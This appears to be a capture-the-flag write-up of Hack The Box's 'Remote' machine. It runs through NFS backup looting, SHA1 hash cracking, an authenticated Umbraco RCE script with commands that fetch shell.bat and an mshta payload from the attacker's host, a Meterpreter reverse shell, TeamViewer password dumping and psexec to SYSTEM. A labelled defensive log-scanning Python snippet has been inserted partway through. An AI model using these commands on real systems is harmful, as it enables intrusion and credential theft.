Remote
Sun, 15 September 2024
Platform: Hack The Box
Nmap scan report for 10.129.230.172
Host is up (0.058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 59m58s
| smb2-time:
| date: 2024-09-14T14:35:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
curl 10.129.230.172:80/people | grep '<h3 class="employee-grid__item__name">' | awk '{print $2 " " $3}'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 6739 100 6739 0 0 50960 0 --:--:-- --:--:-- --:--:-- 51053
class="employee-grid__item__name">Jan Skovgaard</h3>
class="employee-grid__item__name">Matt Brailsford</h3>
class="employee-grid__item__name">Lee Kelleher</h3>
class="employee-grid__item__name">Jeavon Leopold</h3>
class="employee-grid__item__name">Jeroen Breuer</h3>
Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer
showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
[Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 56ms]
http://remote.htb/install
| --> | /umbraco/
[Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 380ms]
http://remote.htb/umbraco
searchsploit umbraco
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------
sudo mount.nfs remote.htb:site_backups -w /mnt
cd /mnt
grep -rw "username" .
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:15:24,558 [P4408/D20/T16] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:16:55,036 [P4408/D20/T41] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:36,660 [P4408/D20/T37] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:42,642 [P4408/D20/T16] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:31,767 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:38,043 [P4408/D20/T41] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:52,835 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:28:28,366 [P4408/D20/T6] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:28:54,043 [P4408/D15/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:45,046 [P4408/D18/T39] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:53,831 [P4408/D18/T6] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
Login attempt succeeded for username admin@htb.local
Login attempt succeeded for username ssmith@htb.local
Login attempt failed for username Umbracoadmin123!!
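Added example, not part of the original notes: a defender-side check over UmbracoTraceLog sign-in lines like the ones above. It flags a failed login whose "username" looks like a secret and is followed shortly by a success from the same IP, which means the log (and any backup of it) now holds a credential. The 60-second window and the character-class heuristic are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Log lines copied from the grep output above (file-name prefix removed).
SAMPLE = """\
2020-02-20 00:21:36,660 [P4408/D20/T37] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
2020-02-20 00:21:42,642 [P4408/D20/T16] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 00:27:31,767 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
2020-02-20 00:27:52,835 [P4408/D20/T45] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 00:28:28,366 [P4408/D20/T6] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
"""

# Timestamp, result, username and source IP of one sign-in event.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+ .*?"
    r"Login attempt (?P<result>succeeded|failed) for username (?P<user>.+) "
    r"from IP address (?P<ip>\S+)$"
)
EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def looks_like_secret(user):
    """Heuristic (assumption): not an e-mail, >= 8 chars, >= 3 character classes."""
    if EMAIL.match(user) or len(user) < 8:
        return False
    classes = [r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"]
    return sum(bool(re.search(c, user)) for c in classes) >= 3

def find_leaked_secrets(text, window=timedelta(seconds=60)):
    """Return failed logins that look like a secret typed into the username field."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    events.sort(key=lambda e: e[0])
    findings = []
    for i, (ts, result, user, ip) in enumerate(events):
        if result != "failed" or not looks_like_secret(user):
            continue
        for ts2, result2, user2, ip2 in events[i + 1:]:
            if ts2 - ts > window:
                break
            if result2 == "succeeded" and ip2 == ip:
                findings.append({"time": ts.isoformat(sep=" "), "account": user2, "ip": ip,
                                 "redacted": user[0] + "*" * (len(user) - 1)})
                break
    return findings
```

Each finding names the account that logged in right after the suspicious entry and reports the logged value only in redacted form, so the report itself does not become another copy of the secret.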
find . -type f -exec strings {} + | grep "admin"
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
find . -type f -exec strings {} + | grep "ssmith"
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' | johnx rockyou
Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
Wordlist: rockyou
Format: raw-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 512/512 AVX512BW 16x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2024-09-15 00:06) 2.631g/s 25849Kp/s 25849Kc/s 25849KC/s baconbarnett..baconand21
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
http://remote.htb/umbraco
login:
admin@htb.local:baconandcheese
Umbraco version 7.12.4
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c curl -a "10.10.16.4:8088/shell.bat -o C:/programdata/shell.bat"
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c "C:/programdata/shell.bat"
cd C:\Users\Public\Desktop
type user.txt
e4df2964f254745b546da66ccd7d6381
Directory of C:\Users\Public\Desktop
01/09/2024 10:48 AM <DIR> .
01/09/2024 10:48 AM <DIR> ..
09/14/2024 09:23 PM 971 TeamViewer 7.lnk
09/14/2024 07:03 PM 34 user.txt
2 File(s) 1,005 bytes
2 Dir(s) 13,339,992,064 bytes free
msf6 exploit(multi/handler) > use windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 10.10.16.4
srvhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > set lhost 10.10.16.4
lhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] Using URL: http://10.10.16.4:8080/jE54f2zCU.hta
[*] Server started.
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c mshta.exe -a "http://10.10.16.4:8080/jE54f2zCU.hta"
[*] Sending stage (176198 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.180:49729) at 2024-09-15 04:18:31 +0100
[*] 10.10.16.4 hta_server - Delivering Payload
msf6 exploit(windows/misc/hta_server) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\DefaultAppPool @ REMOTE 10.10.16.4:4444 -> 10.10.10.180:49729 (10.10.10.180)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
impacket-psexec Administrator@remote.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aDJBVBDA.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service EjrD on remote.htb.....
[*] Starting service EjrD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
cd C:\Users\Administrator\Desktop
type root.txt
031af16b2bc6d902d89dcb0602c65ee6